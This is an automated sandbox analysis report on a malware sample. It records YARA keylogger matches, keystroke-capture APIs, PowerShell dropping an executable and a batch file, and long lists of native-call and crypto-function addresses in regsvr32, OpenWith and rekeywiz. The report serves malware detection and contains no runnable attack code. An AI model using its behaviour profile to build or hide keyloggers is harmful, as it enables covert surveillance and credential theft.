Source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_a8751e8d-7
Installs a raw input device (often for capturing keystrokes)
Source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_03e342c0-7
Yara detected Keylogger Generic
Source: Yara match File source: 14.3.OpenWith.exe.1f9e0750000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.OpenWith.exe.1f9e0470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.OpenWith.exe.1f9e0470000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.regsvr32.exe.1c000000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.regsvr32.exe.1c2e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.OpenWith.exe.1f9e0750000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.regsvr32.exe.1c000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.regsvr32.exe.1c2e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2976, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 5208, type: MEMORYSTR

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Desktop\utox_x86_x64.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\utox_x86_x64.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D277000 NtWriteFile,WaitForSingleObject, 4_2_00007FF63D277000
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D276EE0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 4_2_00007FF63D276EE0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA051B4 NtQueryInformationProcess, 9_2_1BA051B4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA056A8 NtQuerySystemInformation,NtQuerySystemInformation,lstrcmpiW,CloseHandle,free, 9_2_1BA056A8
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DF9D30C7 calloc,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,RtlFreeHeap,RtlFreeHeap, 14_3_000001F9DF9D30C7
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0407000 NtWriteFile,WaitForSingleObject, 18_2_00007FF7F0407000
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0406EE0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 18_2_00007FF7F0406EE0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB62688 NtAcceptConnectPort, 18_2_000002A4ACB62688
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000002A4ACB6288C NtAcceptConnectPort, 18_2_000002A4ACB6288C
Contains functionality to communicate with device drivers
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D276190: memcpy,DeviceIoControl,CloseHandle,CloseHandle,GetLastError, 4_2_00007FF63D276190
Detected potential crypto function
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D27B630 4_2_00007FF63D27B630
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2794D0 4_2_00007FF63D2794D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D222FE9 4_2_00007FF63D222FE9
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2ADEF0 4_2_00007FF63D2ADEF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CBF20 4_2_00007FF63D2CBF20
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D26FF10 4_2_00007FF63D26FF10
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CBDE0 4_2_00007FF63D2CBDE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D253DD0 4_2_00007FF63D253DD0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D299E0B 4_2_00007FF63D299E0B
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AFE00 4_2_00007FF63D2AFE00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2BA0E0 4_2_00007FF63D2BA0E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2D40C0 4_2_00007FF63D2D40C0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D29C120 4_2_00007FF63D29C120
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2D7FA0 4_2_00007FF63D2D7FA0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D22FF83 4_2_00007FF63D22FF83
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AFFF0 4_2_00007FF63D2AFFF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D253FB7 4_2_00007FF63D253FB7
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2B2030 4_2_00007FF63D2B2030
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D26DA50 4_2_00007FF63D26DA50
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D281A40 4_2_00007FF63D281A40
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D283AA0 4_2_00007FF63D283AA0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23BA80 4_2_00007FF63D23BA80
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2D7AC0 4_2_00007FF63D2D7AC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D239B30 4_2_00007FF63D239B30
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C5B00 4_2_00007FF63D2C5B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D251B00 4_2_00007FF63D251B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D28F960 4_2_00007FF63D28F960
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AB9B0 4_2_00007FF63D2AB9B0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D221A31 4_2_00007FF63D221A31
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23DC80 4_2_00007FF63D23DC80
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2D5CE0 4_2_00007FF63D2D5CE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D255CC0 4_2_00007FF63D255CC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D26DD00 4_2_00007FF63D26DD00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D293B40 4_2_00007FF63D293B40
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2BDBE0 4_2_00007FF63D2BDBE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C9BC0 4_2_00007FF63D2C9BC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D29D671 4_2_00007FF63D29D671
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D22565B 4_2_00007FF63D22565B
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D231665 4_2_00007FF63D231665
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AD6A8 4_2_00007FF63D2AD6A8
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2BF730 4_2_00007FF63D2BF730
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CB720 4_2_00007FF63D2CB720
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AF5F0 4_2_00007FF63D2AF5F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2675F0 4_2_00007FF63D2675F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2D15DD 4_2_00007FF63D2D15DD
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2515E0 4_2_00007FF63D2515E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2995B6 4_2_00007FF63D2995B6
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AF840 4_2_00007FF63D2AF840
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2918A0 4_2_00007FF63D2918A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D29D887 4_2_00007FF63D29D887
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2A9920 4_2_00007FF63D2A9920
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D287770 4_2_00007FF63D287770
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2B9750 4_2_00007FF63D2B9750
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C1780 4_2_00007FF63D2C1780
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D22F7E0 4_2_00007FF63D22F7E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D24B800 4_2_00007FF63D24B800
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D29B7FD 4_2_00007FF63D29B7FD
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D243290 4_2_00007FF63D243290
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2D7330 4_2_00007FF63D2D7330
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D277170 4_2_00007FF63D277170
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2BD160 4_2_00007FF63D2BD160
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23D1D0 4_2_00007FF63D23D1D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D24B200 4_2_00007FF63D24B200
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AF440 4_2_00007FF63D2AF440
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2934B6 4_2_00007FF63D2934B6
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C7530 4_2_00007FF63D2C7530
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D25D520 4_2_00007FF63D25D520
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C3350 4_2_00007FF63D2C3350
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23B350 4_2_00007FF63D23B350
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2D5410 4_2_00007FF63D2D5410
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D272E70 4_2_00007FF63D272E70
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D22EDB4 4_2_00007FF63D22EDB4
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D250D80 4_2_00007FF63D250D80
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CADE0 4_2_00007FF63D2CADE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D25F060 4_2_00007FF63D25F060
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AF0A0 4_2_00007FF63D2AF0A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D28D0A0 4_2_00007FF63D28D0A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2ACFCB 4_2_00007FF63D2ACFCB
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23F030 4_2_00007FF63D23F030
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D264AC0 4_2_00007FF63D264AC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C2B00 4_2_00007FF63D2C2B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D29A990 4_2_00007FF63D29A990
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2A8A20 4_2_00007FF63D2A8A20
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CEC60 4_2_00007FF63D2CEC60
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D298CAC 4_2_00007FF63D298CAC
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C8CF0 4_2_00007FF63D2C8CF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C0CE0 4_2_00007FF63D2C0CE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D28ED00 4_2_00007FF63D28ED00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D262B80 4_2_00007FF63D262B80
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C4BF0 4_2_00007FF63D2C4BF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23AC30 4_2_00007FF63D23AC30
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D268C00 4_2_00007FF63D268C00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C06A0 4_2_00007FF63D2C06A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2326E2 4_2_00007FF63D2326E2
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C6710 4_2_00007FF63D2C6710
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D254579 4_2_00007FF63D254579
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D260870 4_2_00007FF63D260870
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23C860 4_2_00007FF63D23C860
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2B2920 4_2_00007FF63D2B2920
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2A4920 4_2_00007FF63D2A4920
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2C4750 4_2_00007FF63D2C4750
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D25A740 4_2_00007FF63D25A740
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2927A4 4_2_00007FF63D2927A4
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2347CD 4_2_00007FF63D2347CD
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D240820 4_2_00007FF63D240820
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D29E23A 4_2_00007FF63D29E23A
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CA2A0 4_2_00007FF63D2CA2A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2682A0 4_2_00007FF63D2682A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D22E28F 4_2_00007FF63D22E28F
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23C170 4_2_00007FF63D23C170
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2B41B0 4_2_00007FF63D2B41B0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D24E180 4_2_00007FF63D24E180
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CC1F0 4_2_00007FF63D2CC1F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23446C 4_2_00007FF63D23446C
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D23A4A0 4_2_00007FF63D23A4A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2BE4C0 4_2_00007FF63D2BE4C0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2B8520 4_2_00007FF63D2B8520
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AC358 4_2_00007FF63D2AC358
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2AC356 4_2_00007FF63D2AC356
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2803A0 4_2_00007FF63D2803A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB4B394DFB 5_2_00007FFB4B394DFB
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C18D7 9_3_028C18D7
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_028C08A4 9_2_028C08A4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_028C18D7 9_2_028C18D7
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA04A54 9_2_1BA04A54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA09FFC 9_2_1BA09FFC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA05BC0 9_2_1BA05BC0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA01500 9_2_1BA01500
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA02F00 9_2_1BA02F00
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA0870C 9_2_1BA0870C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA0710C 9_2_1BA0710C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA03CEC 9_2_1BA03CEC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA08A58 9_2_1BA08A58
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA1BBA3 9_2_1BA1BBA3
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA13AEB 9_2_1BA13AEB
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_1BA12243 9_2_1BA12243
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00007FFB4B3A098D 9_2_00007FFB4B3A098D
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DDF20967 14_3_000001F9DDF20967
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DF9D5E7C 14_3_000001F9DF9D5E7C
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DF9D4A38 14_3_000001F9DF9D4A38
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DF9D2C3C 14_3_000001F9DF9D2C3C
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DF9D557C 14_3_000001F9DF9D557C
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DF9D1BA6 14_3_000001F9DF9D1BA6
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DF9D279C 14_3_000001F9DF9D279C
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DF9D24F7 14_3_000001F9DF9D24F7
Source: C:\Windows\System32\OpenWith.exe Code function: 14_3_000001F9DF9D58FC 14_3_000001F9DF9D58FC
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04094D0 18_2_00007FF7F04094D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F040B630 18_2_00007FF7F040B630
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03B2FE9 18_2_00007FF7F03B2FE9
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0407170 18_2_00007FF7F0407170
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F044D160 18_2_00007FF7F044D160
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03DB200 18_2_00007FF7F03DB200
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03CD1D0 18_2_00007FF7F03CD1D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03D3290 18_2_00007FF7F03D3290
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0467330 18_2_00007FF7F0467330
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0453350 18_2_00007FF7F0453350
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03CB350 18_2_00007FF7F03CB350
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0465410 18_2_00007FF7F0465410
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043F440 18_2_00007FF7F043F440
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04234B6 18_2_00007FF7F04234B6
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03ED520 18_2_00007FF7F03ED520
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0457530 18_2_00007FF7F0457530
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03E15E0 18_2_00007FF7F03E15E0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043F5F0 18_2_00007FF7F043F5F0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04615DD 18_2_00007FF7F04615DD
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03F75F0 18_2_00007FF7F03F75F0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04295B6 18_2_00007FF7F04295B6
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03C1665 18_2_00007FF7F03C1665
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F042D671 18_2_00007FF7F042D671
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043D6A8 18_2_00007FF7F043D6A8
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03B56D2 18_2_00007FF7F03B56D2
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0417770 18_2_00007FF7F0417770
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0451780 18_2_00007FF7F0451780
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F044F730 18_2_00007FF7F044F730
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F045B720 18_2_00007FF7F045B720
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0449750 18_2_00007FF7F0449750
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03BF7E0 18_2_00007FF7F03BF7E0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03DB800 18_2_00007FF7F03DB800
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F042B7FD 18_2_00007FF7F042B7FD
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F042D887 18_2_00007FF7F042D887
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043F840 18_2_00007FF7F043F840
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04218A0 18_2_00007FF7F04218A0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F041F960 18_2_00007FF7F041F960
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0439920 18_2_00007FF7F0439920
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043B9B0 18_2_00007FF7F043B9B0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03CBA80 18_2_00007FF7F03CBA80
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03B1A31 18_2_00007FF7F03B1A31
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03FDA50 18_2_00007FF7F03FDA50
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0411A40 18_2_00007FF7F0411A40
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03E1B00 18_2_00007FF7F03E1B00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0455B00 18_2_00007FF7F0455B00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0413AA0 18_2_00007FF7F0413AA0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0467AC0 18_2_00007FF7F0467AC0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03C9B30 18_2_00007FF7F03C9B30
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0423B40 18_2_00007FF7F0423B40
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F044DBE0 18_2_00007FF7F044DBE0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0459BC0 18_2_00007FF7F0459BC0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03CDC80 18_2_00007FF7F03CDC80
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0465CE0 18_2_00007FF7F0465CE0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03FDD00 18_2_00007FF7F03FDD00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03E5CC0 18_2_00007FF7F03E5CC0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F045BDE0 18_2_00007FF7F045BDE0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0429E0B 18_2_00007FF7F0429E0B
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043FE00 18_2_00007FF7F043FE00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03E3DD0 18_2_00007FF7F03E3DD0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043DEF0 18_2_00007FF7F043DEF0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03FFF10 18_2_00007FF7F03FFF10
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03BFF83 18_2_00007FF7F03BFF83
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F045BF20 18_2_00007FF7F045BF20
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043FFF0 18_2_00007FF7F043FFF0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0467FA0 18_2_00007FF7F0467FA0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03E3FB7 18_2_00007FF7F03E3FB7
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0442030 18_2_00007FF7F0442030
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F044A0E0 18_2_00007FF7F044A0E0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04640C0 18_2_00007FF7F04640C0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03CC170 18_2_00007FF7F03CC170
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03DE180 18_2_00007FF7F03DE180
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F042C120 18_2_00007FF7F042C120
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F045C1F0 18_2_00007FF7F045C1F0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04441B0 18_2_00007FF7F04441B0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03BE28F 18_2_00007FF7F03BE28F
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F042E23A 18_2_00007FF7F042E23A
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03F82A0 18_2_00007FF7F03F82A0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F045A2A0 18_2_00007FF7F045A2A0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043C358 18_2_00007FF7F043C358
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F043C356 18_2_00007FF7F043C356
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04103A0 18_2_00007FF7F04103A0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03C446C 18_2_00007FF7F03C446C
